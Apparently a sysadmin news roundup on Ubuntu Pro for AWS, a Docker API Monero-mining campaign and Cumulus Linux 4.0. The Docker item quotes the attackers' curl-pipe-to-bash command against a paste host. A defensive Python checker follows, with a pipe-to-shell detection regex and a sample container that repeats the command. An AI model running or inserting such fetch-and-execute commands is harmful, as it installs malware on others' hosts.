News for Admins

Tech News

Article from ADMIN 55/2020
In the news: Canonical now offers an Ubuntu Pro image for AWS; Vulnerable Docker instance sought out by Monero malware; Cumulus Networks enhances their network-specific Linux; and SUSE adds SUSE Linux Enterprise to the Oracle Cloud Infrastructure.

Canonical Now Offers an Ubuntu Pro Image for AWS

Ubuntu rules the cloud. According to The Cloud Market (https://thecloudmarket.com/stats#/by_platform_definition), Ubuntu is the most widely used cloud image on the Amazon Elastic Compute Cloud (with nearly 370K images deployed). Not one to be satisfied with being at the top of the digital heap, Canonical (https://canonical.com/) – the company behind Ubuntu (https://ubuntu.com/) – has released a new version of their venerable Ubuntu platform.

Ubuntu Pro was created specifically for Amazon Web Services. This new image starts from the standard Canonical Ubuntu Amazon Machine Image and layers security and compliance subscriptions on top of it. Specifically, Ubuntu Pro includes:

  • Up to 10 years of package and security updates for Ubuntu 18.04, and up to eight years for 14.04 and 16.04
  • Kernel Livepatch for continuous security patching without reboots
  • Customized FIPS and Common Criteria EAL-compliant components (for environments that require FedRAMP, PCI, HIPAA, and ISO compliance)
  • Patch coverage for Ubuntu's infrastructure and app repositories for all types of open source services
  • System management with Landscape
  • Integration with AWS security and compliance features, such as AWS Security Hub and AWS CloudTrail (applicable from 2020)
  • Subscriptions available for Ubuntu Advantage support packages (https://ubuntu.com/support)

Ubuntu Pro is available via the AWS Marketplace (https://aws.amazon.com/marketplace/search/results?x=0&y=0&searchTerms=ubuntu+pro) and the prices range from free to $0.33 per hour (for software plus AWS usage fees).

Vulnerable Docker Instance Sought Out by Monero Malware

Near the end of November it was discovered that some Docker instances were vulnerable to a specific attack vector (https://www.zdnet.com/article/a-hacking-group-is-hijacking-docker-systems-with-exposed-api-endpoints/) that would allow the injection of Monero mining programs. During the two days the target campaign was live, over 14.82 Monero (XMR) was mined. That amount translates to roughly $800.

Although that amount wasn't enough to turn heads, what was significant about this vulnerability was the number of scans that occurred. During that campaign, hackers scanned up to 59,000 IP networks for exposed API endpoints. Once attackers located an exposed endpoint, an Alpine Linux OS container was deployed to run the command

chroot /mnt /bin/sh -c 'curl -sL4 http://ix.io/1XQa | bash;'

(which downloads a bash script that would install the XMRig cryptocurrency miner).

The issue was discovered by security firm Bad Packets LLC. Bad Packets also found that the malware contained a self-defense measure that not only disables security but also shuts down processes associated with rival cryptocurrency-mining botnets.

To avoid such a vulnerability, Troy Mursch (cofounder and chief research officer of Bad Packets LLC) says Docker container admins should immediately check to see if they are exposing API endpoints to the Internet. If so, admins should close exposed ports and stop/delete any unrecognized containers.
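
An added example (not from the article or from Bad Packets) of the check recommended above: it reads a daemon.json and `docker inspect` output and reports API listeners reachable beyond loopback without client-certificate verification, plus containers that mount the host root or pipe a download into a shell. The function names and sample data are constructed for illustration, and listeners configured with the dockerd -H flag rather than daemon.json are assumed to be checked separately.

```python
import json
import re
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "localhost", "::1"}
# Pattern described in the article: a download piped straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")

def unauthenticated_tcp_hosts(daemon_json):
    """daemon.json 'hosts' entries that serve the API over TCP on a
    non-loopback address without client-certificate checks (tlsverify)."""
    cfg = json.loads(daemon_json)
    if cfg.get("tlsverify"):
        return []
    return [h for h in cfg.get("hosts", [])
            if urlsplit(h).scheme == "tcp"
            and urlsplit(h).hostname not in LOOPBACK]

def suspicious_containers(inspect_json):
    """Names of containers (from `docker inspect` JSON) that bind-mount the
    host root filesystem or whose command pipes a download into a shell."""
    flagged = []
    for c in json.loads(inspect_json):
        cfg, host = c.get("Config", {}), c.get("HostConfig", {})
        mounts_root = any(b.split(":")[0] == "/" for b in host.get("Binds") or [])
        argv = (cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or [])
        if mounts_root or PIPE_TO_SHELL.search(" ".join(argv)):
            flagged.append(c.get("Name", "?").lstrip("/"))
    return flagged

# Constructed sample data (not taken from a real host).
SAMPLE_DAEMON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web",
     "Config": {"Image": "nginx", "Cmd": ["nginx", "-g", "daemon off;"]},
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
    {"Name": "/unknown1",
     "Config": {"Image": "alpine", "Cmd": ["chroot", "/mnt", "/bin/sh", "-c",
                "curl -sL4 http://example.invalid/x | bash;"]},
     "HostConfig": {"Binds": ["/:/mnt"]}},
])

if __name__ == "__main__":
    print("exposed API listeners:", unauthenticated_tcp_hosts(SAMPLE_DAEMON))
    print("containers to review:", suspicious_containers(SAMPLE_INSPECT))
```

On a real host, feed it the contents of /etc/docker/daemon.json and the output of `docker inspect $(docker ps -aq)`; a flagged container is a prompt for review, not proof of compromise.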

Cumulus Networks Enhances Their Network-Specific Linux

Cumulus Linux is a full-featured Linux operating system designed specifically for the networking industry. Cumulus supports a wide array of networking hardware (https://cumulusnetworks.com/products/hardware-compatibility-list/) and is fully compliant with the Open Compute Project's networking specification (including the Open Network Install Environment).

With the release of Cumulus Linux 4.0, there are a number of changes, so make sure you are informed before you upgrade.

First and foremost, Cumulus Linux 4.0 is now based on Debian Buster (version 10) and includes the Linux 4.19 kernel. Along with this kernel, Meltdown and Spectre fixes are finally (and fully) up to date.

The next most important advancement for Cumulus Linux is the integration of switchdev. Switchdev is an open source in-kernel abstraction model that provides a standardized method of programming switch ASICs and speeds up development time.

Cumulus Linux 4.0 has added a few new supported platforms, such as Edgecore Minipack AS8000 (100G Tomahawk 3), Mellanox SN3700C (100G Spectrum-2), Mellanox SN3700 (200G Spectrum-2), and HPE SN2345M (100G Spectrum).

Other new features in Cumulus Linux include the ability to use apt-get upgrade to move to a specific kernel release, EVPN BUM traffic handling (using PIM-SM on Broadcom switches), PIM active-active with MLAG, port security on Broadcom switches, WJH support on Mellanox switches (to stream detailed/contextual telemetry for off-box analysis), and a new backup and restore utility. In addition, the FRRouting daemons and daemons.conf files have been merged into the daemons file, Zebra is now enabled by default (in the daemons file), MAC learning is disabled by default on all VXLAN bridge ports, and much more.

Read about all of the new changes to Cumulus Linux online (https://support.cumulusnetworks.com/hc/en-us/articles/360038231814-What-s-New-and-Different-in-Cumulus-Linux-4-0-0?mobile_site=true).
